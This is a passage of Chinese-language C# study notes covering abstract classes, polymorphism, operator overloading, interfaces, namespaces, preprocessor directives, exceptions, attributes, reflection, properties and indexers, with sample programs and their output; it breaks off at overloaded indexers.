    ​C# 允许您使用关键字 abstract 创建抽象类,用于提供接口的部分类的实现。当一个派生类继承自该抽象类时,实现即完成。抽象类包含抽象方法,抽象方法可被派生类实现。派生类具有更专业的功能。

    ​请注意,下面是有关抽象类的一些规则:

    • 您不能创建一个抽象类的实例。
    • 您不能在一个抽象类外部声明一个抽象方法。
    • 通过在类定义前面放置关键字 sealed,可以将类声明为密封类。当一个类被声明为 sealed 时,它不能被继承。抽象类不能被声明为 sealed。

    ​在 C# 中,抽象类(abstract class)和接口(interface)是两种用于实现多态性的重要机制,它们有几个关键的区别:

    1. 定义和用途:
      • 抽象类: 是一个类,可以包含抽象方法(没有实现的方法)和具体方法(有实现的方法)。抽象类不能被实例化,只能被继承。子类必须实现(重写)抽象类中的所有抽象方法,除非子类也声明为抽象类。抽象类可以包含字段、属性、构造函数等。
      • 接口: 是一种引用类型,定义了一个类或结构体必须遵循的一组方法和属性的契约。接口只能包含方法、属性、事件和索引器的声明,且不能包含任何实现。类通过实现接口来保证其提供了接口定义的所有成员。
    2. 多继承:
      • 抽象类: C# 中不支持多继承,一个类只能继承自一个抽象类(或具体类)。抽象类本身可以实现多个接口。
      • 接口: 支持多重继承,一个类可以实现多个接口。这使得接口在定义类的行为时更加灵活。
    3. 成员实现:
      • 抽象类: 可以包含方法的实现,子类可以选择性地重写这些方法。
      • 接口: 不能包含方法的实现,只能定义方法的签名。
    4. 字段和常量:
      • 抽象类: 可以包含字段(字段可以是私有的、受保护的等),也可以包含常量字段。
      • 接口: 不能包含字段,只能包含常量。
    5. 设计层次:
      • 抽象类: 通常用于描述一种“是什么”的关系,即表示一种基本的类型或概念,并且希望子类扩展其功能。
      • 接口: 通常用于描述一种“能做什么”的能力,即规定了一组行为或功能,类通过实现接口来表明自己具有这些能力。
    using System;
    namespace PolymorphismApplication
    {
    abstract class Shape
    {
    abstract public int area(); // 标记为 abstract 的函数只可声明,不可定义实现
    }

    class Rectangle : Shape
    {
    private int length;
    private int width;
    public Rectangle(int a = 0, int b = 0)
    {
    length = a;
    width = b;
    }
    public override int area() // 若要实现继承所定义的函数,使用 override 标记
    {
    Console.WriteLine("Rectangle 类的面积:");
    return (width * length);
    }
    }

    class RectangleTester
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle(10, 7);
    double a = r.area();
    Console.WriteLine("面积: {0}", a);
    Console.ReadKey();
    }
    }
    }
    Rectangle 类的面积:
    面积: 70

    ​当有一个定义在类中的函数需要在继承类中实现时,可以使用虚方法(与 abstract 相比,virtual 可以在基类中定义实现)。

    • 虚方法是使用关键字 virtual 声明的。

    • 虚方法可以在不同的继承类中有不同的实现。

    • 对虚方法的调用是在运行时发生的。

    • 动态多态性是通过 抽象类虚方法 实现的。

    ​以下实例创建了 Shape 基类,并创建派生类 Circle、 Rectangle、Triangle, Shape 类提供一个名为 Draw 的虚拟方法,在每个派生类中重写该方法以绘制该类的指定形状。

    using System;
    using System.Collections.Generic;

    public abstract class Shape
    {
    public int X { get; private set; }
    public int Y { get; private set; }
    public int Height { get; set; }
    public int Width { get; set; }

    // 虚方法
    public virtual void Draw()
    {
    Console.WriteLine("执行基类的画图任务");
    }
    }

    class Circle : Shape
    {
    public override void Draw() // 同样使用 override
    {
    Console.WriteLine("画一个圆形");
    base.Draw();
    }
    }
    class Rectangle : Shape
    {
    public override void Draw()
    {
    Console.WriteLine("画一个长方形");
    base.Draw();
    }
    }
    class Triangle : Shape
    {
    public override void Draw()
    {
    Console.WriteLine("画一个三角形");
    base.Draw();
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    // 创建一个 List<Shape> 对象,并向该对象添加 Circle、Triangle 和 Rectangle
    var shapes = new List<Shape>
    {
    new Rectangle(),
    new Triangle(),
    new Circle()
    };

    // 使用 foreach 循环对该列表的派生类进行循环访问,并对其中的每个 Shape 对象调用 Draw 方法
    foreach (var shape in shapes)
    {
    shape.Draw();
    }

    Console.WriteLine("按下任意键退出。");
    Console.ReadKey();
    }

    }
    画一个长方形
    执行基类的画图任务
    画一个三角形
    执行基类的画图任务
    画一个圆形
    执行基类的画图任务
    按下任意键退出。

    ​下面的程序演示通过虚方法 area() 来计算不同形状图像的面积(同样的语句,底层执行不同的代码):

    using System;
    namespace PolymorphismApplication
    {
    class Shape
    {
    protected int width, height;
    public Shape( int a=0, int b=0)
    {
    width = a;
    height = b;
    }
    public virtual int area()
    {
    Console.WriteLine("父类的面积:");
    return 0;
    }
    }
    class Rectangle: Shape
    {
    public Rectangle( int a=0, int b=0): base(a, b)
    {

    }
    public override int area ()
    {
    Console.WriteLine("Rectangle 类的面积:");
    return (width * height);
    }
    }
    class Triangle: Shape
    {
    public Triangle(int a = 0, int b = 0): base(a, b)
    {

    }
    public override int area()
    {
    Console.WriteLine("Triangle 类的面积:");
    return (width * height / 2);
    }
    }
    class Caller
    {
    public void CallArea(Shape sh)
    {
    int a;
    a = sh.area();
    Console.WriteLine("面积: {0}", a);
    }
    }
    class Tester
    {

    static void Main(string[] args)
    {
    Caller c = new Caller();
    Rectangle r = new Rectangle(10, 7);
    Triangle t = new Triangle(10, 5);
    c.CallArea(r);
    c.CallArea(t);
    Console.ReadKey();
    }
    }
    }
    Rectangle 类的面积:
    面积: 70
    Triangle 类的面积:
    面积: 25

    C# 运算符重载

    您可以重定义或重载 C# 中内置的运算符。因此,程序员也可以使用用户自定义类型的运算符。重载运算符是具有特殊名称的函数,是通过关键字 operator 后跟运算符的符号来定义的。与其他函数一样,重载运算符有返回类型和参数列表。

    运算符重载的实现

    using System;

    namespace OperatorOvlApplication
    {
    class Box
    {
    private double length; // 长度
    private double breadth; // 宽度
    private double height; // 高度

    public double getVolume()
    {
    return length * breadth * height;
    }
    public void setLength( double len )
    {
    length = len;
    }

    public void setBreadth( double bre )
    {
    breadth = bre;
    }

    public void setHeight( double hei )
    {
    height = hei;
    }
    // 重载 + 运算符来把两个 Box 对象相加
    public static Box operator+ (Box b, Box c)
    {
    Box box = new Box();
    box.length = b.length + c.length;
    box.breadth = b.breadth + c.breadth;
    box.height = b.height + c.height;
    return box;
    }

    }

    class Tester
    {
    static void Main(string[] args)
    {
    Box Box1 = new Box(); // 声明 Box1,类型为 Box
    Box Box2 = new Box(); // 声明 Box2,类型为 Box
    Box Box3 = new Box(); // 声明 Box3,类型为 Box
    double volume = 0.0; // 体积

    // Box1 详述
    Box1.setLength(6.0);
    Box1.setBreadth(7.0);
    Box1.setHeight(5.0);

    // Box2 详述
    Box2.setLength(12.0);
    Box2.setBreadth(13.0);
    Box2.setHeight(10.0);

    // Box1 的体积
    volume = Box1.getVolume();
    Console.WriteLine("Box1 的体积: {0}", volume);

    // Box2 的体积
    volume = Box2.getVolume();
    Console.WriteLine("Box2 的体积: {0}", volume);

    // 把两个对象相加
    Box3 = Box1 + Box2;

    // Box3 的体积
    volume = Box3.getVolume();
    Console.WriteLine("Box3 的体积: {0}", volume);
    Console.ReadKey();
    }
    }
    }
    Box1 的体积: 210
    Box2 的体积: 1560
    Box3 的体积: 5400

    可重载和不可重载运算符

    运算符描述
    +, -, !, ~, ++, –这些一元运算符只有一个操作数,且可以被重载
    +, -, *, /, %这些二元运算符带有两个操作数,且可以被重载
    ==, !=, <, >, <=, >=这些比较运算符可以被重载
    &&, ||这些条件逻辑运算符不能被直接重载。
    +=, -=, *=, /=, %=这些赋值运算符不能被重载。
    =, ., ?:, ->, new, is, sizeof, typeof这些运算符不能被重载。

    C# 接口(Interface)

    • 接口定义了所有类继承接口时应遵循的语法合同。接口定义了语法合同 “是什么” 部分,派生类定义了语法合同 “怎么做” 部分。

    • 接口定义了属性、方法和事件,这些都是接口的成员。接口只包含了成员的声明。成员的定义是派生类的责任。接口提供了派生类应遵循的标准结构

    • 接口使得实现接口的类或结构在形式上保持一致。

    • 抽象类在某种程度上与接口类似,但是,它们大多只是用在当只有少数方法由基类声明由派生类实现时。

    • 接口本身并不实现任何功能,它只是和声明实现该接口的对象订立一个必须实现哪些行为的契约。

    • 抽象类不能直接实例化,但允许派生出具体的,具有实际功能的类。


    ​接口使用 interface 关键字声明,它与类的声明类似。接口声明默认是 public 的。下面是一个接口声明的实例:

    ​以上代码定义了接口 IMyInterface。通常接口命令以 I 字母开头,这个接口只有一个方法 MethodToImplement(),没有参数和返回值,当然我们可以按照需求设置参数和返回值。

    ​值得注意的是,该方法并没有具体的实现。

    using System;

    interface IMyInterface
    {
    // 接口成员
    void MethodToImplement();
    }

    class InterfaceImplementer : IMyInterface
    {
    static void Main()
    {
    InterfaceImplementer iImp = new InterfaceImplementer();
    iImp.MethodToImplement();
    }

    public void MethodToImplement()
    {
    Console.WriteLine("MethodToImplement() called.");
    }
    }
    MethodToImplement() called.

    ​以下实例定义了两个接口 IMyInterfaceIParentInterface

    ​(接口可以继承其他接口)如果一个接口继承其他接口,那么实现类或结构就需要实现所有接口的成员。

    ​以下实例 IMyInterface 继承了 IParentInterface 接口,因此接口实现类必须实现 MethodToImplement()ParentInterfaceMethod() 方法:

    using System;

    interface IParentInterface
    {
    void ParentInterfaceMethod();
    }

    interface IMyInterface : IParentInterface
    {
    void MethodToImplement();
    }

    class InterfaceImplementer : IMyInterface
    {
    static void Main()
    {
    InterfaceImplementer iImp = new InterfaceImplementer();
    iImp.MethodToImplement();
    iImp.ParentInterfaceMethod();
    }

    public void MethodToImplement()
    {
    Console.WriteLine("MethodToImplement() called.");
    }

    public void ParentInterfaceMethod()
    {
    Console.WriteLine("ParentInterfaceMethod() called.");
    }
    }
    MethodToImplement() called.
    ParentInterfaceMethod() called.

    C# 命名空间(Namespace)

    命名空间的设计目的是提供一种让一组名称与其他名称分隔开的方式在一个命名空间中声明的类的名称与另一个命名空间中声明的相同的类的名称不冲突

    ​我们举一个计算机系统中的例子,一个文件夹(目录)中可以包含多个文件夹,每个文件夹中不能有相同的文件名,但不同文件夹中的文件可以重名。

    定义命名空间
    using System;

    namespace first_space
    {
    class namespace_cl
    {
    public void func()
    {
    Console.WriteLine("Inside first_space");
    }
    }
    }
    namespace second_space
    {
    class namespace_cl
    {
    public void func()
    {
    Console.WriteLine("Inside second_space");
    }
    }
    }
    class TestClass
    {
    static void Main(string[] args)
    {
    first_space.namespace_cl fc = new first_space.namespace_cl();
    second_space.namespace_cl sc = new second_space.namespace_cl();
    fc.func();
    sc.func();
    Console.ReadKey();
    }
    }
    Inside first_space
    Inside second_space
    using 关键字

    using 关键字表明程序使用的是给定命名空间中的名称。例如,我们在程序中使用 System 命名空间,其中定义了类 Console。我们可以只写:

    Console.WriteLine ("Hello there");

    ​我们可以写完全限定名称,如下:

    System.Console.WriteLine("Hello there");

    ​您也可以使用 using 命名空间指令,这样在使用的时候就不用在前面加上命名空间名称。(类似于 C++ 里的 using namespace std;

    using System;
    using first_space;
    using second_space;

    namespace first_space
    {
    class abc
    {
    public void func()
    {
    Console.WriteLine("Inside first_space");
    }
    }
    }
    namespace second_space
    {
    class efg
    {
    public void func()
    {
    Console.WriteLine("Inside second_space");
    }
    }
    }
    class TestClass
    {
    static void Main(string[] args)
    {
    abc fc = new abc();
    efg sc = new efg();
    fc.func();
    sc.func();
    Console.ReadKey();
    }
    }
    Inside first_space
    Inside second_space
    嵌套命名空间

    ​命名空间可以被嵌套,即您可以在一个命名空间内定义另一个命名空间,如下所示:

    using System;
    using SomeNameSpace;
    using SomeNameSpace.Nested;

    namespace SomeNameSpace
    {
    public class MyClass
    {
    static void Main()
    {
    Console.WriteLine("In SomeNameSpace");
    Nested.NestedNameSpaceClass.SayHello();
    }
    }

    // 内嵌命名空间
    namespace Nested
    {
    public class NestedNameSpaceClass
    {
    public static void SayHello()
    {
    Console.WriteLine("In Nested");
    }
    }
    }
    }

    C# 预处理器指令

    预处理器指令(Preprocessor Directives)指导编译器在实际编译开始之前对信息进行预处理

    ​通过这些指令,可以控制编译器如何编译文件或编译哪些部分。常见的预处理器指令包括条件编译、宏定义等。

    ​所有的预处理器指令都是以 # 开始,且在一行上,只有空白字符可以出现在预处理器指令之前。

    ​预处理器指令不是语句,所以它们不以分号 ; 结束。

    ​C# 编译器没有一个单独的预处理器,但是,指令被处理时就像是有一个单独的预处理器一样。在 C# 中,预处理器指令用于在条件编译中起作用。与 C 和 C++ 不同的是,它们不是用来创建宏。一个预处理器指令必须是该行上的唯一指令。

    C# 预处理器指令列表

    ​下表列出了 C# 中可用的预处理器指令:

    指令描述
    #define定义一个符号,可以用于条件编译。
    #undef取消定义一个符号。
    #if开始一个条件编译块,如果符号被定义则包含代码块。
    #elif如果前面的 #if#elif 条件不满足,且当前条件满足,则包含代码块。
    #else如果前面的 #if#elif 条件不满足,则包含代码块。
    #endif结束一个条件编译块。
    #warning生成编译器警告信息。
    #error生成编译器错误信息。
    #region标记一段代码区域,可以在 IDE 中折叠和展开这段代码,便于代码的组织和阅读。
    #endregion结束一个代码区域。
    #line更改编译器输出中的行号和文件名,可以用于调试或生成工具的代码。
    #pragma用于给编译器发送特殊指令,例如禁用或恢复特定的警告。
    #nullable控制可空性上下文和注释,允许启用或禁用对可空引用类型的编译器检查。

    #define 和 #undef 预处理器

    #define 用于定义符号(通常用于条件编译),#undef 用于取消定义符号。

    #define DEBUG

    #undef RELEASE

    ​#define 允许您定义一个符号,这样,通过使用符号作为传递给 #if 指令的表达式,表达式将返回 true。它的语法如下:

    #define PI 
    using System;
    namespace PreprocessorDAppl
    {
    class Program
    {
    static void Main(string[] args)
    {
    #if (PI)
    Console.WriteLine("PI is defined");
    #else
    Console.WriteLine("PI is not defined");
    #endif
    Console.ReadKey();
    }
    }
    }
    PI is defined

    条件指令:#if, #elif, #else 和 #endif

    ​您可以使用 #if 指令来创建一个条件指令。

    ​条件指令用于测试符号是否为真。如果为真,编译器会执行 #if 和下一个指令之间的代码。

    ​条件指令的语法:

    #define DEBUG
    #define VC_V10
    using System;
    public class TestClass
    {
    public static void Main()
    {

    #if (DEBUG && !VC_V10)
    Console.WriteLine("DEBUG is defined");
    #elif (!DEBUG && VC_V10)
    Console.WriteLine("VC_V10 is defined");
    #elif (DEBUG && VC_V10)
    Console.WriteLine("DEBUG and VC_V10 are defined");
    #else
    Console.WriteLine("DEBUG and VC_V10 are not defined");
    #endif
    Console.ReadKey();
    }
    }
    DEBUG and VC_V10 are defined

    #pragma

    ​用于向编译器发送特殊指令。最常见的用法是禁用特定的警告。

    #pragma warning disable 414
    private int unusedVariable;
    #pragma warning restore 414

    使用预处理器指令的注意事项

    • 提高代码可读性:使用 #region 可以帮助分隔代码块,提高代码的组织性。
    • 条件编译:通过 #if 等指令可以在开发和生产环境中编译不同的代码,方便调试和发布。
    • 警告和错误:通过 #warning#error 可以在编译时提示开发人员注意特定问题。

    ​通过正确使用这些预处理器指令,可以更好地控制代码的编译过程,提高代码的灵活性和可维护性。

    C# 正则表达式

    ​其实我觉得可以用 ChatGPT 帮自己写正则表达式。

    using System;
    using System.Text.RegularExpressions;

    public class Example
    {
    public static void Main()
    {
    string input = "1851 1999 1950 1905 2003";
    string pattern = @"(?<=19)\d{2}\b";

    foreach (Match match in Regex.Matches(input, pattern))
    Console.WriteLine(match.Value);
    }
    }
    99
    50
    05

    C# 异常处理

    ​异常是在程序执行期间出现的问题。C# 中的异常是对程序运行时出现的特殊情况的一种响应,比如尝试除以零。

    ​异常提供了一种把程序控制权从某个部分转移到另一个部分的方式。C# 异常处理时建立在四个关键词之上的:trycatchfinallythrow

    • try:一个 try 块标识了一个将被激活的特定的异常的代码块。后跟一个或多个 catch 块。
    • catch:程序通过异常处理程序捕获异常。catch 关键字表示异常的捕获。
    • finally:finally 块用于执行给定的语句,不管异常是否被抛出都会执行。例如,如果您打开一个文件,不管是否出现异常文件都要被关闭。
    • throw:当问题出现时,程序抛出一个异常。使用 throw 关键字来完成。

    C# 中的异常类

    ​C# 异常是使用类来表示的。C# 中的异常类主要是直接或间接地派生于 System.Exception 类。System.ApplicationExceptionSystem.SystemException 类是派生于 System.Exception 类的异常类。

    • System.ApplicationException 类支持由应用程序生成的异常。所以程序员定义的异常都应派生自该类。

    • System.SystemException 类是所有预定义的系统异常的基类。

    ​下表列出了一些派生自 System.SystemException 类的预定义的异常类:

    异常类描述
    System.IO.IOException处理 I/O 错误。
    System.IndexOutOfRangeException处理当方法指向超出范围的数组索引时生成的错误。
    System.ArrayTypeMismatchException处理当数组类型不匹配时生成的错误。
    System.NullReferenceException处理当依从一个空对象时生成的错误。
    System.DivideByZeroException处理当除以零时生成的错误。
    System.InvalidCastException处理在类型转换期间生成的错误。
    System.OutOfMemoryException处理空闲内存不足生成的错误。
    System.StackOverflowException处理栈溢出生成的错误。

    异常处理

    ​C# 以 try 和 catch 块的形式提供了一种结构化的异常处理方案。使用这些块,把核心程序语句与错误处理语句分离开。

    ​这些错误处理块是使用 trycatch(若发生异常,执行)和 finally(无论是否有异常,均执行)关键字实现的。下面是一个当除以零时抛出异常的实例:

    using System;
    namespace ErrorHandlingApplication
    {
    class DivNumbers
    {
    int result;
    DivNumbers()
    {
    result = 0;
    }
    public void division(int num1, int num2)
    {
    try
    {
    result = num1 / num2;
    }
    catch (DivideByZeroException e)
    {
    Console.WriteLine("Exception caught: {0}", e);
    }
    finally
    {
    Console.WriteLine("Result: {0}", result);
    }

    }
    static void Main(string[] args)
    {
    DivNumbers d = new DivNumbers();
    d.division(25, 0);
    d.division(25, 5);
    Console.ReadKey();
    }
    }
    }
    Exception caught: System.DivideByZeroException: 尝试除以零。
    在 ErrorHandlingApplication.DivNumbers.division(Int32 num1, Int32 num2) 位置 XXX.cs:行号 15
    Result: 0
    Result: 5
    创建用户自定义异常

    ​您也可以定义自己的异常。用户自定义的异常类是派生自 ApplicationException 类。使用 throw 来抛出异常。下面的实例演示了这点:

    using System;
    namespace UserDefinedException
    {
    class TestTemperature
    {
    static void Main(string[] args)
    {
    Temperature temp = new Temperature();
    try
    {
    temp.showTemp();
    }
    catch (TempIsZeroException e)
    {
    Console.WriteLine("TempIsZeroException: {0}", e.Message);
    }
    Console.ReadKey();
    }
    }
    }
    public class TempIsZeroException : ApplicationException
    {
    public TempIsZeroException(string message) : base(message)
    {
    }
    }
    public class Temperature
    {
    int temperature = 0;
    public void showTemp()
    {
    if (temperature == 0)
    {
    throw (new TempIsZeroException("Zero Temperature found"));
    }
    else
    {
    Console.WriteLine("Temperature: {0}", temperature);
    }
    }
    }
    TempIsZeroException: Zero Temperature found
    抛出对象

    ​如果异常是直接或间接派生自 System.Exception 类,您可以抛出一个对象。您可以在 catch 块中使用 throw 语句来抛出当前的对象,如下所示:

    Catch(Exception e)
    {
    ...
    Throw e
    }

    C# 文件的输入与输出

    ​一个 文件 是一个存储在磁盘中带有指定名称和目录路径的数据集合。当打开文件进行读写时,它变成一个

    ​从根本上说,流是通过通信路径传递的字节序列。有两个主要的流:输入流输出流输入流用于从文件读取数据(读操作),输出流用于向文件写入数据(写操作)。

    FileStream 类

    System.IO 命名空间中的 FileStream 类有助于文件的读写与关闭。该类派生自抽象类 Stream。

    ​您需要创建一个 FileStream 对象来创建一个新的文件,或打开一个已有的文件。


    ​具体地问 ChatGPT 吧……

    高级语法

    C# 特性

    ​Unity 里比较常用。

    ​**特性(Attribute)**是用于在运行时传递程序中各种元素(比如类、方法、结构、枚举、组件等)的行为信息的声明性标签。您可以通过使用特性向程序添加声明性信息。一个声明性标签是通过放置在它所应用的元素前面的方括号([ ])来描述的。

    ​特性(Attribute)用于添加元数据,如编译器指令和注释、描述、方法、类等其他信息。.Net 框架提供了两种类型的特性:预定义特性和自定义特性。

    预定义特性(Attribute)

    ​.Net 框架提供了三种预定义特性:

    • AttributeUsage

      • 预定义特性 AttributeUsage 描述了如何使用一个自定义特性类。它规定了特性可应用到的项目的类型。
    • Conditional

      • 这个预定义特性标记了一个条件方法,其执行依赖于指定的预处理标识符。

        它会引起方法调用的条件编译,取决于指定的值,比如 DebugTrace。例如,当调试代码时显示变量的值。

    • Obsolete

      • 这个预定义特性标记了不应被使用的程序实体。它可以让您通知编译器丢弃某个特定的目标元素。例如,当一个新方法被用在一个类中,但是您仍然想要保持类中的旧方法,您可以通过显示一个应该使用新方法,而不是旧方法的消息,来把它标记为 obsolete(过时的)。

    创建自定义特性(Attribute)

    ​一个新的自定义特性应派生自 System.Attribute 类。

    // 一个自定义特性 BugFix 被赋给类及其成员
    using System;

    [AttributeUsage(AttributeTargets.Class |
    AttributeTargets.Constructor |
    AttributeTargets.Field |
    AttributeTargets.Method |
    AttributeTargets.Property,
    AllowMultiple = true)]

    public class DeBugInfo : System.Attribute
    {
    private int bugNo;
    private string developer;
    private string lastReview;
    public string message;

    public DeBugInfo(int bg, string dev, string d)
    {
    this.bugNo = bg;
    this.developer = dev;
    this.lastReview = d;
    }

    public int BugNo
    {
    get
    {
    return bugNo;
    }
    }
    public string Developer
    {
    get
    {
    return developer;
    }
    }
    public string LastReview
    {
    get
    {
    return lastReview;
    }
    }
    public string Message
    {
    get
    {
    return message;
    }
    set
    {
    message = value;
    }
    }
    }

    [DeBugInfo(45, "Zara Ali", "12/8/2012", Message = "Return type mismatch")]
    [DeBugInfo(49, "Nuha Ali", "10/10/2012", Message = "Unused variable")]
    class Rectangle
    {
    // 成员变量
    protected double length;
    protected double width;
    public Rectangle(double l, double w)
    {
    length = l;
    width = w;
    }
    [DeBugInfo(55, "Zara Ali", "19/10/2012",
    Message = "Return type mismatch")]
    public double GetArea()
    {
    return length * width;
    }
    [DeBugInfo(56, "Zara Ali", "19/10/2012")]
    public void Display()
    {
    Console.WriteLine("Length: {0}", length);
    Console.WriteLine("Width: {0}", width);
    Console.WriteLine("Area: {0}", GetArea());
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle(5, 8);
    r.Display();
    }
    }
    Length: 5
    Width: 8
    Area: 40

    C# 反射(Reflection)

    ​反射指程序可以访问、检测和修改它本身状态或行为的一种能力。

    ​程序集包含模块,而模块包含类型,类型又包含成员。反射则提供了封装程序集、模块和类型的对象。

    ​您可以使用反射动态地创建类型的实例,将类型绑定到现有对象,或从现有对象中获取类型。然后,可以调用类型的方法或访问其字段和属性。

    优缺点

    优点:

    • 1、反射提高了程序的灵活性和扩展性。
    • 2、降低耦合性,提高自适应能力。
    • 3、它允许程序创建和控制任何类的对象,无需提前硬编码目标类。

    缺点:

    • 1、性能问题:使用反射基本上是一种解释操作,用于字段和方法接入时要远慢于直接代码。因此反射机制主要应用在对灵活性和拓展性要求很高的系统框架上,普通程序不建议使用。
    • 2、使用反射会模糊程序内部逻辑;程序员希望在源代码中看到程序的逻辑,反射却绕过了源代码的技术,因而会带来维护的问题,反射代码比相应的直接代码更复杂。

    反射(Reflection)的用途

    ​反射(Reflection)有下列用途:

    • 它允许在运行时查看特性(attribute)信息。
    • 它允许审查集合中的各种类型,以及实例化这些类型。
    • 它允许延迟绑定的方法和属性(property)。
    • 它允许在运行时创建新类型,然后使用这些类型执行一些任务。
    using System;

    [AttributeUsage(AttributeTargets.All)]
    public class HelpAttribute : System.Attribute
    {
    public readonly string Url;

    public string Topic // Topic 是一个命名(named)参数
    {
    get
    {
    return topic;
    }
    set
    {

    topic = value;
    }
    }

    public HelpAttribute(string url) // url 是一个定位(positional)参数
    {
    this.Url = url;
    }

    public override string ToString()
    {
    return base.ToString() + ": "+ this.Url;
    }

    private string topic;
    }
    [HelpAttribute("Information on the class MyClass")]
    class MyClass
    {
    }

    namespace AttributeAppl
    {
    class Program
    {
    static void Main(string[] args)
    {
    System.Reflection.MemberInfo info = typeof(MyClass);
    object[] attributes = info.GetCustomAttributes(true);
    for (int i = 0; i < attributes.Length; i++)
    {
    System.Console.WriteLine(attributes[i]);
    }
    Console.ReadKey();

    }
    }
    }
    HelpAttribute: Information on the class MyClass

    C# 属性(Property)

    属性(Property) 是类(class)、结构(structure)和接口(interface)的命名(named)成员。类或结构中的成员变量或方法称为 域(Field)。属性(Property)是域(Field)的扩展,且可使用相同的语法来访问。它们使用 访问器(accessors) 让私有域的值可被读写或操作。

    ​属性(Property)不会确定存储位置。相反,它们具有可读写或计算它们值的 访问器(accessors)

    ​例如,有一个名为 Student 的类,带有 age、name 和 code 的私有域。我们不能在类的范围以外直接访问这些域,但是我们可以拥有访问这些私有域的属性

    访问器(Accessors)

    ​属性(Property)的访问器(accessor)包含有助于获取(读取或计算)或设置(写入)属性的可执行语句。访问器(accessor)声明可包含一个 get 访问器一个 set 访问器,或者同时包含二者。例如:

    using System;
    namespace runoob
    {
    class Student
    {

    private string code = "N.A";
    private string name = "not known";
    private int age = 0;

    // 声明类型为 string 的 Code 属性
    public string Code
    {
    get
    {
    return code;
    }
    set
    {
    code = value;
    }
    }

    // 声明类型为 string 的 Name 属性
    public string Name
    {
    get
    {
    return name;
    }
    set
    {
    name = value;
    }
    }

    // 声明类型为 int 的 Age 属性
    public int Age
    {
    get
    {
    return age;
    }
    set
    {
    age = value;
    }
    }
    public override string ToString()
    {
    return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
    }
    }
    class ExampleDemo
    {
    public static void Main()
    {
    // 创建一个新的 Student 对象
    Student s = new Student();

    // 设置 student 的 code、name 和 age
    s.Code = "001";
    s.Name = "Zara";
    s.Age = 9;
    Console.WriteLine("Student Info: {0}", s);
    // 增加年龄
    s.Age += 1;
    Console.WriteLine("Student Info: {0}", s);
    Console.ReadKey();
    }
    }
    }
    Student Info: Code = 001, Name = Zara, Age = 9
    Student Info: Code = 001, Name = Zara, Age = 10

    ​在这段代码中,将 codenameage 设为私有字段,并通过公共属性 CodeNameAge 进行访问的做法,比直接将它们设为公共字段(public fields)有几个优势:

    1. 封装性和安全性: 使用属性可以提供更好的封装性,隐藏了实现细节(私有字段 codenameage),并且可以在属性的 getter 和 setter 方法中添加额外的逻辑。例如,可以在 setter 中验证输入值的有效性或执行特定的逻辑。
    2. 易于修改和扩展: 如果将字段直接暴露为公共字段,在修改字段名称、类型或者添加验证逻辑时,会影响到所有访问该字段的代码。而使用属性,可以在不影响其他代码的情况下修改属性的实现。
    3. 数据绑定和事件处理: 使用属性使得数据绑定更加容易。一些 GUI 应用程序框架(如 WPF、WinForms)能够自动绑定属性到用户界面元素,这样可以通过属性实现数据的显示和输入验证。此外,属性的 setter 可以触发事件,通知其他对象数据的变化。
    4. 符合面向对象的设计原则: 封装是面向对象编程的核心原则之一,它提供了更好的抽象和封装,使得代码更加模块化、可维护和可测试。

    ​虽然直接使用公共字段也可以达到相同的效果,但这种做法在实际开发中可能会带来更多的问题,例如难以控制访问权限、不利于后续的代码修改和维护等。因此,使用属性来访问私有字段是一种更好的实践,它能够提高代码的可靠性和灵活性。

    抽象属性(Abstract Properties)

    ​抽象类可拥有抽象属性,这些属性应在派生类中被实现。下面的程序说明了这点:

    using System;
    namespace runoob
    {
    public abstract class Person
    {
    public abstract string Name
    {
    get;
    set;
    }
    public abstract int Age
    {
    get;
    set;
    }
    }
    class Student : Person
    {

    private string code = "N.A";
    private string name = "N.A";
    private int age = 0;

    // 声明类型为 string 的 Code 属性
    public string Code
    {
    get
    {
    return code;
    }
    set
    {
    code = value;
    }
    }

    // 声明类型为 string 的 Name 属性
    public override string Name
    {
    get
    {
    return name;
    }
    set
    {
    name = value;
    }
    }

    // 声明类型为 int 的 Age 属性
    public override int Age
    {
    get
    {
    return age;
    }
    set
    {
    age = value;
    }
    }
    public override string ToString()
    {
    return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
    }
    }
    class ExampleDemo
    {
    public static void Main()
    {
    // 创建一个新的 Student 对象
    Student s = new Student();

    // 设置 student 的 code、name 和 age
    s.Code = "001";
    s.Name = "Zara";
    s.Age = 9;
    Console.WriteLine("Student Info:- {0}", s);
    // 增加年龄
    s.Age += 1;
    Console.WriteLine("Student Info:- {0}", s);
    Console.ReadKey();
    }
    }
    }
    Student Info:- Code = 001, Name = Zara, Age = 9
    Student Info:- Code = 001, Name = Zara, Age = 10

    C# 索引器(Indexer)

    索引器(Indexer) 允许一个对象可以像数组一样使用下标的方式来访问。

    ​当您为类定义一个索引器时,该类的行为就会像一个 虚拟数组(virtual array) 一样。您可以使用数组访问运算符 [ ] 来访问该类的的成员。

    索引器(Indexer)的用途

    ​索引器的行为的声明在某种程度上类似于属性(property)。就像属性(property),您可使用 getset 访问器来定义索引器。但是,属性返回或设置一个特定的数据成员,而索引器返回或设置对象实例的一个特定值。换句话说,它把实例数据分为更小的部分,并索引每个部分,获取或设置每个部分。

    ​定义一个属性(property)包括提供属性名称。索引器定义的时候不带有名称,但带有 this 关键字,它指向对象实例。下面的实例演示了这个概念:

    using System;
    namespace IndexerApplication
    {
    class IndexedNames
    {
    private string[] namelist = new string[size];
    static public int size = 10;
    public IndexedNames()
    {
    for (int i = 0; i < size; i++)
    namelist[i] = "N. A.";
    }
    public string this[int index]
    {
    get
    {
    string tmp;

    if (index >= 0 && index <= size - 1)
    {
    tmp = namelist[index];
    }
    else
    {
    tmp = "";
    }

    return (tmp);
    }
    set
    {
    if (index >= 0 && index <= size - 1)
    {
    namelist[index] = value;
    }
    }
    }

    static void Main(string[] args)
    {
    IndexedNames names = new IndexedNames();
    names[0] = "Zara";
    names[1] = "Riz";
    names[2] = "Nuha";
    names[3] = "Asif";
    names[4] = "Davinder";
    names[5] = "Sunil";
    names[6] = "Rubic";
    for (int i = 0; i < IndexedNames.size; i++)
    {
    Console.WriteLine(names[i]);
    }
    Console.ReadKey();
    }
    }
    }
    Zara
    Riz
    Nuha
    Asif
    Davinder
    Sunil
    Rubic
    N. A.
    N. A.
    N. A.

    重载索引器(Indexer)

    ​索引器(Indexer)可被重载。索引器声明的时候也可带有多个参数,且每个参数可以是不同的类型。没有必要让索引器必须是整型的。C# 允许索引器可以是其他类型,例如,字符串类型。

    ​下面的实例演示了重载索引器:

